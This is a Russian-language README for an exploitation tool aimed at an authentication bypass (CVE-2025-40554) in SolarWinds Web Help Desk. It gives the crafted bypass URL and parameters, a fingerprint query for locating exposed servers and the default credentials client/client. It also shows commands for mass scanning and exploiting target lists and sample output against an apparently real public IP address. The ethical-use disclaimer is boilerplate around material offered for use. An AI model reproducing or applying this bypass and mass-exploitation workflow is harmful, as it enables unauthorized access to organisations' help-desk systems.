
Эксплуатация CVE-2025-40554
Комплексный инструмент для тестирования безопасности, предназначенный для обнаружения и эксплуатации уязвимости обхода аутентификации (CVE-2025-40554 / CVE-2025-40536) в SolarWinds Web Help Desk.
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ЦЕЛЕЙ ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ
Данный инструмент предоставляется для исследования безопасности, пентеста и оценки уязвимостей в системах, которые вам принадлежат или на тестирование которых у вас есть явное письменное разрешение. Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправомерное использование или ущерб, причинённый этим инструментом.
CVE-2025-40554 — критическая уязвимость обхода аутентификации в SolarWinds Web Help Desk, позволяющая неавторизованным злоумышленникам:
Проверьте сами :))
Зависимости:
# Клонируйте или загрузите скрипт
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# Сделайте исполняемым
chmod +x CVE-2025-40554.py
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
# Простая проверка уязвимости
python3 CVE-2025-40554.py -t https://target:8443
# С явным указанием протокола
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
# Полная эксплуатация с перечислением сессий
python3 CVE-2025-40554.py -t https://target:8443 --exploit
# Пропустить тестирование учётных данных по умолчанию
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login
# Сканирование нескольких целей из файла
python3 CVE-2025-40554.py -l targets.txt
# Массовое сканирование с эксплуатацией
python3 CVE-2025-40554.py -l targets.txt --exploit
# Тихий режим (минимальный вывод)
python3 CVE-2025-40554.py -l targets.txt -q
# Пользовательский выходной файл
python3 CVE-2025-40554.py -l targets.txt -o results.txt
targets.txt:
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Комментарии поддерживаются
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2025-40554 - SolarWinds Web Help Desk ║
║ Authentication Bypass Exploitation Tool ║
║ Research & Educational Purposes Only ║
╚═══════════════════════════════════════════════════════════════════╝
======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789
[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!
[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!
======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================
[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!
[*] Session Cookies:
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled
[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!
[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed
...
======================================================================
SCAN SUMMARY
======================================================================
Total scanned: 5/5
Vulnerable: 2
With def. creds: 1
======================================================================
[+] Results saved to: vulnerable_targets.txt
Установление сессии
Обход аутентификации
Тестирование учётных данных (опционально)
Полная эксплуатация (режим --exploit)
Инструмент обнаруживает успешный обход, проверяя следующие признаки:
externalAuthContainer — внешняя конфигурация аутентификацииJSONRpcClient — открытие API-клиентаSAML 2.0 — конфигурация SSOLoginPref — настройки предпочтений входаauthMode — настройки режима аутентификацииВклад приветствуется…..
Этот инструмент предоставляется «как есть» без каких-либо гарантий. Используйте на свой страх и риск.
Skynoxk
Помните: Всегда занимайтесь взломом этично и законно. Несанкционированный доступ — преступление.
| Параметр | Описание |
|---|
-t, --target URL | URL одной цели для тестирования |
-l, --list FILE | Файл со списком целей (по одной на строку) |
--exploit | Включить полный режим эксплуатации с перечислением |
--no-login | Пропустить тестирование учётных данных по умолчанию |
-o, --output FILE | Выходной файл для уязвимых целей (по умолчанию: vulnerable_targets.txt) |
-q, --quiet | Режим минимального вывода (полезен для массового сканирования) |